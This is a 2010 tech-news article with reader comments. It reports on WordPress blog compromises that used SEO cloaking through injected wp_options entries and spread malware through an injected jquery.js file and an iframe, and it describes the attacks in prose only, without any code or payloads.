WordPress Hack Terrifies Webmasters - gHacks Tech News

WordPress Hack Terrifies Webmasters

Reports about a WordPress hack affecting self-hosted WordPress blogs have appeared on the Internet in March. The hack seems to affect WordPress 2.9.2, the latest version of the blogging platform, and maybe also older versions as well.

To make matters worse, there seem to be two - possibly unrelated - issues that webmasters experience.

One is a malware attack that is spreading malware on hacked blogs while the other is making use of cloaking techniques to serve a different version of the blog to search engine spiders than to regular visitors and admins.

The cloaking hack appeared on radars in March when bloggers and hosting providers mentioned compromised sites. Media Temple for instance stated on March 2nd that "a number of customer sites [..] have been compromised".

WordPress Hack

wordpress hack

They identified several patterns the attackers used, one of which placed random-string names in the document root of the blog.

But Media Temple hosted WordPress blogs were not the only ones hit by the attack. Reports from webmasters hosted by Godaddy, Network Solutions or VPS.net indicated that the attack was not web hosting company specific.

Fast forward to April 6. Christopher Penn discovered that his blog had been compromised. He found out that the hack on his site injected a new option name into the wp_options table and used encoded JavaScript for obfuscation. The option name always started with rss_.

Deleting that name from the database table stopped the cloaking issues he was experiencing. The key did however appear again which suggested that his blog was still open for the attack, and that something was executing code on the site or server to add the database entries again.

The vulnerability itself has not been discovered yet. Chris suggested that it has either been the TimThumb plugin, or an outdated version of Magpie that WordPress ships with. Both have not yet been confirmed to be the entry points.

There has been no response yet from the WordPress developers regarding this issue.

To make matters worse, a second attack has hit WordPress blogs, this time to spread malware. It is not yet clear if the two attacks are related but it is likely that they are.

Frank Gruber posted information about that second attack on his blog which ironically seems to have been successfully compromised as well.

The virus somehow infiltrates WordPress and adds a new file in your scripts directory called jquery.js and then inserts that file into the header or footer files of your site. It also inserts an iFrame that calls a 3rd party site which is known for malware or other malicious activities.

The Trend Micro blog shares additional information about the virus that is being spread using this attack. The attack "leads into an infection chain that leads to various malware, including a rogue antivirus[..]".

To sum it up:

  • Several WordPress blogs running the latest official version are currently successfully compromised.
  • Attackers either manipulate the blog to spread malware (more recently) or to cloak links that are only visible to search engines
  • It is currently not clear how the attacks are carried out.
  • Some information are available on how to disinfect a blog

Update: Most recent versions of WordPress have resolved the issues. If you have not updated yet, it is highly suggested that you do so immediately.

WordPress webmasters should check their blogs immediately to make sure that it has not been compromised yet. A wordpress plugin like Antivirus might also help in preventing a successful attack.

Summary
Wordpress Hack Terrifies Webmasters
Article Name
WordPress Hack Terrifies Webmasters
Description
Reports about two previously unknown attacks on WordPress blogs appeared recently on the Internet that are used to spread malware or fake links.
Author
Publisher
Ghacks Technology News
Logo




  • We need your help

    Advertising revenue is falling fast across the Internet, and independently-run sites like Ghacks are hit hardest by it. The advertising model in its current form is coming to an end, and we have to find other ways to continue operating this site.

    We are committed to keeping our content free and independent, which means no paywalls, no sponsored posts, no annoying ad formats (video ads) or subscription fees.

    If you like our content, and would like to help, please consider making a contribution:

    Comments

    1. Manpreet Singh Rehsi said on April 12, 2010 at 5:02 pm
      Reply

      This is really a big issue to worry about. I shall be waiting for a security fix from WordPress developers in few days.

      1. Mark Jaquith said on April 13, 2010 at 11:35 pm
        Reply

        The WordPress team currently has no evidence to suggest that this is a security issue with WordPress itself. WordPress is often the victim subsequent to other types of security breaches. Because WordPress sites are web-facing and usually are well ranked, they are a juicy target. So however a hacker gets in, if they find a WordPress blog once they’re in there, they’ll be tempted to use their existing access to mess with the WordPress install.

        1. Martin said on April 13, 2010 at 11:45 pm
          Reply

          Mark it was a rights problem as you probably already know.

    2. HNicolai said on April 12, 2010 at 11:12 pm
      Reply

      “Problem” solved :)

      http://www.theregister.co.uk/2010/04/12/network_solutions_wordpress_hack/

      But I don’t think this is the last time we’ve going to see hacks like that one :(

      And btw. why is wordpress storing the password as clear text? A simple salt + md5 would at least make the hack slower.

      1. Martin said on April 13, 2010 at 12:43 am
        Reply

        Nice find HNicolai. Are not most configuration files storing the database information in plain text? Think all the major php apps that I installed do it that way.

      2. Mark Jaquith said on April 13, 2010 at 11:32 pm
        Reply

        There is no other way to store it. It must be in clear text. Period.

      3. Fenix said on April 14, 2010 at 8:49 am
        Reply

        looks like you have never seen your wp_options table, your password is stored as a MD5 hash

        1. Martin said on April 14, 2010 at 9:45 am
          Reply

          Fenix we are talking about the file containing the database connection information which is located in the root folder of the wordpress installation, not the database itself.

    3. ras1643 said on May 12, 2010 at 12:54 am
      Reply

      I agree on Martin’s comment about PHP that passwords in the config file must be in text format. My website was recently attack and GoDaddy was able to identify the files that contain malware which is a total of 300 files. I deleted all the files and change my FTP password. Luckily I don’t use SSH.

    4. David Dede said on May 14, 2010 at 8:27 pm
      Reply

      As far as that SEO spam technique being used, we also found this:
      http://blog.sucuri.net/2010/05/it-is-not-over-seo-spam-on-sites.html

      These random php files read from the .files directory still available on thousand of sites.

    Leave a Reply